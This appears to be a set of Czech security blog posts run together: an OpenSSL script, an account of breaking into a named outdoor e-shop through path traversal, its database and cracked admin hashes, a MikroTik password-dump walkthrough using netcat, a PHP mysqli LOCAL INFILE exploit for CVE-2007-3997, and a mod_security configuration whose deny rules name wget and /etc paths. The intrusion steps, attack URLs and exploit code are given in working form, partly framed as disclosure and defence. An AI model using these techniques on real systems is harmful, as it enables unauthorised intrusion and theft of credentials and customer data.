#!/bin/bash
SERVER_NAME=$1
OPENSSL_PATH=/usr/bin/openssl
$OPENSSL_PATH genrsa -des3 -out $SERVER_NAME.key 1024
$OPENSSL_PATH genrsa -out $SERVER_NAME.key 1024
$OPENSSL_PATH rsa -in $SERVER_NAME.key -out $SERVER_NAME.pem
$OPENSSL_PATH req -new -key $SERVER_NAME.pem -out $SERVER_NAME.csr
$OPENSSL_PATH x509 -req -days 365 -in $SERVER_NAME.csr -signkey $SERVER_NAME.pem -out $SERVER_NAME.crt


V tom lepším případě, by při nabourání obchodu „hackerem“, mohlo vyjít najevo, že si každý měsíc po výplatě objednáváte nějakou sprosťárničku v sexshopu. V horším případě útočník zjistí i heslo a bude si tak moct číst vaši soukromou poštu s přítelkyní/milenkou/manželkou neboť do emailu zadáváte stejné heslo jako do eshopu. Pokud chcete slyšet hororové scénáře, pak věřte, že není problém využít uložených informací o vaší kartě a objednat si tak jakékoliv zboží, které ve výsledku ovšem nezaplatí útočník, ale vy z vaší karty.

Stále si myslíte, že se vám to nemůže stát neboť nakupujete pouze v renomovaných a velkých eshopech? Chyba!

Před před více jak týdnem jsem zcela náhodou objevil na stránkách jednoho z největších českých prodejců outdoorového vybavení – firmy Rock point zcela zásadní (a naprosto školáckou) bezpečnostní chybu. Ihned jsem prodejce emailově kontaktoval a problém mu nastínil. Bohužel do dnešního dne jsem neobdržel odpověď a chyba je stále neopravená.

O co jde?

Při hledání dokumentace k jednomu z výrobků jsem narazil na následující odkaz:

http://www.rockpoint.cz/download.php?soubor=soubory/seznam_odberatelu_NET.xls

Nebývá zrovna zvykem, že by prodejce uveřejňoval seznam svých odběratelů. To ve mě vyvolalo pocit, že tato stránka měla být před zraky zákazníků ukryta. Začal jsem přemýšlet, co by se stalo, kdybych zadal jako parametr jiný soubor než je seznam_odberatelu_NET.xls. Po chvíli jsem tedy do adresního řádku zadal následující adresu:

http://www.rockpoint.cz/download.php?soubor=soubory/../index.php

Při čemž „index.php“ bývá „startovací stránkou“ webu a řetězec „../“ značí, že se jedná o nadřazený adresář.
To co se stalo mi téměř vyrazilo dech. Zobrazila se mi totiž opravdu zdrojová stránka souboru index.php. Opravdu bych nečekal, že u tak velkého prodejce narazím na tak kritickou chybu.

Ze zvědavosti jsem stejným způsobem procházel všechny ostatní soubory na serveru, až jsem došel k následujícímu:

http://www.rockpoint.cz/download.php?soubor=inc/conf_databaze.php

Tento soubor (jak je již patrné z názvu) obsahuje data potřebná pro připojení k My SQL databázi.
Tím ovšem má zvědavost neskončila. Rozhodl jsem se výsledek ověřit.

V konfiguračním souboru je uveden jako My SQL host „uvdb4.globe.cz“. Vzdálený přístup k této databázi sice není povolen, ale to mě nemohlo odradit. Po chvíli hledání jsem zjistil, že se jedná o server, který je provozován v rámci hostingu Active 24. Na stejnojmenných stránkách jsem pak v sekci podpora našel odkaz k PHPMyAdminovi, který umožňuje spravovat My SQL databáze pomocí web prohlížeče. Kliknul jsem na link a zadal přihlašovací údaje. Nemohlo následovat nic jiného, než úspěšné přihlášení. Přede mnou byl kompletní seznam všech výrobků, uživatelů, objednávek a seznamů prodejen. V podstatě bych v této chvíli mohl eshop plně ovládnout, ale mě zajímala poslední neprozkoumaná věc – administrativní sekce obchodu.

Administrační sekci nebylo zase tak těžké najít. Kupodivu se nacházela na url:

http://www.rockpoint.cz/admin/

Nahlédl jsem zpět do tabulky administrátorů, abych zjistil přihlašovací jméno a heslo. Zde byla alespoň nějaká snaha o zabezpečení – heslo bylo zakódováno pomocí algoritmu MD5. Bohužel tento algoritmus je už dnes „překonaný“. Heslo prvního administrátora jsem tak „rozlouskl“ díky jeho jednoduchosti přes jednu z online HASH databází. Heslo druhého administrátora bylo sice složitější, ovšem pod útokem rainbow tabulek bylo později prolomeno také. Oba účty jsem ještě otestoval – byly funkční. Tím má „práce“ skončila.

Výše uvedený text nenabádá k zneužití popsané chyby. Text byl sepsán z důvodu laxního přístupu administrátorů danných stránek.

Tento příspěvek je chráněn heslem. Pokud ho chcete zobrazit, zadejte prosím heslo:

Heslo:

Tento příspěvek je chráněn heslem. Pokud ho chcete zobrazit, zadejte prosím heslo:

Heslo:

1. Zapojíme USB->COM redukci. U mě se redukce namapuje na ttyUSB0 – viz hláška z dmesg

[ 8446.216000] usb 1-1: pl2303 converter now attached to ttyUSB0

2. Nainstalujeme TFTP server
# sudo apt-get install atftpd

3. Opravíme konfiguraci démona xinet přidáním parametru „-inetd_compat“
# sudo vi /etc/default/xinetd
XINETD_OPTS="-stayalive -inetd_compat"

4. Nahrajeme alternativní kernel s podporou yaffs2 do adresáře /tftpboot

5. Nainstalujeme DHCP server
# sudo apt-get install dhcp3-server

6. Nastavíme parametry DHCP serveru
# sudo vi /etc/dhcp3/dhcpd.conf
default-lease-time 21600;
max-lease-time 43200;
option domain-name-servers 10.0.0.1;
option netbios-name-servers 10.0.0.1;
option netbios-node-type 8;
option www-server 10.0.0.1;
authoritative;
allow booting;
allow bootp;

subnet 10.0.0.0 netmask 255.255.255.0
{
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
filename "/tftpboot/linuxrc";
range 10.0.0.10 10.0.0.100;
}

7. Nastavíme IP adresu na našem síťovém rozhraní, spustíme DHCP a TFTP server
sudo ifconfig eth0 down
sudo ifconfig eth0 10.0.0.1 up
sudo /etc/init.d/xinetd restart
sudo /etc/init.d/dhcp3-server start

8. Spustíme konfiguraci minicomu
# minimcom -s

Vybereme položku „Nastavení sériového portu“ a nastavíme následující parametry:

A - Sériové zařízení : /dev/ttyUSB0
B - Umístění zámku : /var/lock
C - Program pro příchozí volání:
D - Program pro odchozí volání :
E - Bps/Par/Bity : 115200 8N1
F - Hardwarová kontrola toku : Ano
G - Softwarová kontrola toku : Ne

Připojíme kabel do Mikrotiku
Mělo by se zobrazit:
MikroTik 2.9.46
MikroTik Login:

Rebootujeme Mikrotik

Zobrazí se:
RouterBOOT booter 2.10
RouterBoard 532A
CPU frequency: 399 MHz
Memory size: 64 MB
Press any key within 2 seconds to enter setup.

Zmáčkneme libovolnou klávesu dříve, než vyprší interval.

Zobrazí se:
RouterBOOT-2.10
What do you want to configure?
d - boot delay
k - boot key
s - serial console
o - boot device
u - cpu mode
f - try cpu frequency
c - keep cpu frequency
r - reset configuration
e - format nand
g - upgrade firmware
i - board info
p - boot protocol
t - do memory testing
x - exit setup
your choice:

Vyberme „o“ pro volbu „boot device“.

Zobrazí se:
Select boot device:
e - boot over Ethernet
* n - boot from NAND, if fail then Ethernet
c - boot from CompactFlash only
1 - boot Ethernet once, then NAND
2 - boot Ethernet once, then CompactFlash
o - boot from NAND only
b - boot chosen device
your choice:

Vybereme „1″ pro boot z Ethernetu (a následně NAND)

Zobrazí se:
RouterBOOT-2.10
What do you want to configure?
d - boot delay
k - boot key
s - serial console
o - boot device
u - cpu mode
f - try cpu frequency
c - keep cpu frequency
r - reset configuration
e - format nand
g - upgrade firmware
i - board info
p - boot protocol
t - do memory testing
x - exit setup
your choice:

Vybereme „p“ pro „boot protocol“.

Zobrazí se:
Choose which boot protocol to use:
1 - bootp protocol
* 2 - dhcp protocol
your choice:

Vybereme „2″ pro „dhcp“ protocol“

Zobrazí se nám opět úvodní menu
What do you want to configure?
d - boot delay
k - boot key
s - serial console
o - boot device
u - cpu mode
f - try cpu frequency
c - keep cpu frequency
r - reset configuration
e - format nand
g - upgrade firmware
i - board info
p - boot protocol
t - do memory testing
x - exit setup
your choice:

Vybereme „x“ pro uložení a opuštění setupu. Mikrotik se znovu rebootuje.

Nyní by se měl načíst nový kernel – v mém případě z opravené distribuce OpenWrt
BusyBox v1.4.2 (2008-01-15 11:43:12 CET) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
KAMIKAZE (7.09) -----------------------------------
* 10 oz Vodka Shake well with ice and strain
* 10 oz Triple sec mixture into 10 shot glasses.
* 10 oz lime juice Salute!
---------------------------------------------------
root@OpenWrt:/#

Vypíšeme si jednotlivé blokové zařízení
#cat /proc/mtd
dev: size erasesize name
mtd0: 00400000 00004000 "RouterBoard NAND Boot"
mtd1: 03c00000 00004000 "RouterBoard NAND Main"

Připojíme filesystém na kterém jsou uložena hesla
# mount -t yaffs2 -o ro /dev/mtdblock1 /mnt

Na PC si spustíme netcat s následujícími parametry
sudo /bin/netcat -l -p 666 > user.dat

Na mikrotiku zobrazíme soubor s hesly a přes netcat ho pošleme do PC
cat /mnt/nova/store/user.dat|nc 10.0.0.1 666

Na PX spustíme nástroj na lámání hesel
# ./mtpass user.dat
mtpass v0.2 - MikroTik RouterOS password recovery tool
Reading file user.dat, 213 bytes long
Rec# | Username | Password | Disable flag | User comment
--------------------------------------------------------------------------------------------
1 | admin | mojeheslo | | system default user

Návod vychází z informací na stránkách http://manio.skyboo.net/mikrotik/
Autor neručí za případné škody při použití tohoto návodu.

Vztahuje se k:
< = PHP 5.2.3
<= PHP 4.4.7

CVE:
CVE-2007-3997

Problém:
Díky rozšířením MySQL a MySQLi v PHP lze obejít bezpečnostní politiku safe_mode.

Detail:
Pomocí funkce MySQL LOCAL INFILE lze získat libovolný soubor ze systému.

Řešení:
1) Kompilovat MySQL klienta s parametrem „–disable-local-infile“
- nepomůže při použití MySQLi, neboť volba se dá znovu povolit příkazem „mysqli->options(MYSQLI_OPT_LOCAL_INFILE, 1);“
2) Do konfiguračního souboru (/etc/mysql/my.cnf) vložit (do sekce [mysqld]) „set-variable=local-infile=0″.

Exploit:
function r($fp, &$buf, $len, &$err) {print fread($fp, $len);}
$m = new mysqli(‘localhost’, ‘aaaa’, “, ‘a’);
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler(„r“);
$m->query(„LOAD DATA LOCAL INFILE ‘/etc/passwd’ INTO TABLE a.a“);
$m->close();

Původně jsem zamýšlel použít globalní .htaccess a vněm mod_rewrite. Chtěl jsem parsovat veškeré požadavky na jednotlivé portály a sanitizovat je. Ačkoliv se toto řešení jevilo jako správné, v praxi jsem od něj musel upustit a najít řešení lepší. Oprášil jsem tak své záložky v prohlížeči a narazil na mod_security do Apache. Něco málo jsem o něm slyšel a už dlouho jsem ho chtěl vyzkoušet – teď k tomu byla velice vhodná příležitost.

Instalace na debianu byla více než snadná:

# 1. Nejprve jsem nainstaloval samotný modul
apt-get install libapache2-mod-security

# 2. Následně jsem jej povolili ke spuštění v Apache
a2enmod mod-security

# 3. Nechtěl jsem vymýšlet celou konfiguraci z hlavy a tak jsem si zkopíroval vzorovou
cp /usr/share/doc/libapache2-mod-security/examples/httpd2.conf.example-full /etc/apache2/conf.d/mod_security.conf

# 4. A tu jsem si upravil
vi /etc/apache2/conf.d/mod_security.conf

SecFilterEngine On
SecFilterCheckURLEncoding On
SecFilterCheckUnicodeEncoding Off
SecFilterForceByteRange 0 255
SecAuditEngine RelevantOnly
SecAuditLog /var/log/apache2/audit_log
SecFilterDebugLog /var/log/apache2/modsec_debug_log
SecFilterDebugLevel 0
SecFilterScanPOST On
SecFilterDefaultAction "deny,log,status:500"
SecFilter /etc/[0-9a-z]
SecFilter /bin/[0-9a-z]
SecFilter /usr/[0-9a-z]
SecFilter /usr/bin/[0-9a-z]
SecFilter /tmp/[0-9a-z]
SecFilter cd\x20/tmp
SecFilter wget\x20
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"
SecFilter "< [[:space:]]*script"
#SecFilter "<(.|\n)+>"


# 6. Následoval reload Apache serveru
/etc/init.d/apache2 force-reload

Co to všechno umí?
Mod_security nám vyčistí veškeré požadavky (jak GEt tak i POST) od zbytečných dvojitých lomítek (//), odkazů na sebe sama (./), dokáže zaměnit „\“ za „/“, přehodí %00 za obyčejnou mezeru kontroluje validitu a bytovou přesnost požadavku, dokáže vyhodnotit požadavek na základě regexpů.

Na základě detekce „řetezce“ je pak podle konfiguračního souboru (SecFilterDefaultAction) schopný vytvořit i několik akcí mezi něž patří:
deny – zakáže požadavek
allow – zastaví kontrolu pravidel a povolí request
status:xxx, – odpoví s HTTP statusem xxx
redirect:url, – přesměruje požadavek na danou (absolutní) adresu
exec:cmd – vykoná příkaz cmd (vhodné s nějakým odesílátkem emailů)
log – uloží request s detaily do logu
nolog – neukládá request do logu
pass – ignoruje toto pravidlo a pokračuje v dalších pravidlech
pause:xxx – pozdrží request o xxx milisekund (pozor at neprovedete DoS útok na sebe sami)
chain – skočí na další pravidlo v chainu
skipnext:n, přskočí n pravidel

Regexpové filtry
Asi nejjednodušším filtrem v mod_security je zadání SecFilter.
V konfiguračním souboru apache/mod_security máme:
SecFilterEngine On
SecFilterCheckURLEncoding On
SecFilterCheckUnicodeEncoding Off
SecAuditEngine RelevantOnly
SecAuditLog /var/log/apache2/audit_log
SecFilterDebugLog /var/log/apache2/modsec_debug_log
SecFilterScanPOST On
SecFilterDefaultAction "deny,log,status:500"
SecFilter /etc/passwd

Jakmile do prohlížeče zadáme adresu například http://hodza.net/test.php?shell=/etc/passwd, vyhodí nám prohlížeč chybu 500 a do /var/log/apache2/audit_log zapíše následující:

HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/4.3.10-19
Content-Length: 2166
Connection: close
Content-Type: text/html
========================================
Request: 85.160.65.12 - - [21/Mar/2007:11:23:55 +0100] "GET /test.php?shell=/etc/passwd HTTP/1.1" 500 2157
Handler: (null)
----------------------------------------
GET /test.php?shell=/etc/passwd HTTP/1.1
Host: hodza.net
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: IMAIL_SESS_KEY_1174461441-18654=LIuOFNUhDI3vlqgL; IMAIL_SESS_KEY_1174458493-41266=6pdFfVCoIZlnTdz2; IMAIL_SESS_KEY_1174458956-45632=22MSPZFhVgcl4HBF; wpthemefd01865e503f46c67c4df25a7c0983da=Magellan; IMAIL_SESS_KEY_1174458444-78097=yICVpRLlelQ7b4WR; IMAIL_TEST_COOKIE=test; PHPSESSID=4968f3ea1b79953b8e1e20febf5c3bfd; phpMyAdmin=d44d6e2f64ccd35352989d45c30a9b90; wordpressuser_fd01865e503f46c67c4df25a7c0983da=admin; wordpresspass_fd01865e503f46c67c4df25a7c0983da=2fb3192c5df98faf13d864c4a3b1fd06; dbx-postmeta=grabit:0+|1-|2-|3-|4-|5-&advancedstuff:0-|1-|2-
mod_security-message: Access denied with code 500. Pattern match "/etc/passwd" at THE_REQUEST
mod_security-action: 500
HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/4.3.10-19
Content-Length: 2157
Connection: close
Content-Type: text/html

Jak vidíte – krásné, jednoduché účinné a spolehlivé.
Další využití mod_security je na snadě. Při psaní příspěvku jsem si vzpomněl na Vlastu, kdy měl v komentářích na blogu snad desetkrát řetězec „Cheap phentermine….“. Přitom stačilo zapnout mod_security a dát do konfiguráku SecFilter „Cheap phentermine“ nebo zakázat spamerského User-Agenta, případně znepřístupnit blok IP adres odkud jsou příspěvky rozesílány.

# ssldump -d -A -k /etc/postfix/tls/private_key.pem -i eth1 -n host 195.39.10.7&

Nezapomeňte samozřejmně změnit IP adresu a privátní klíč.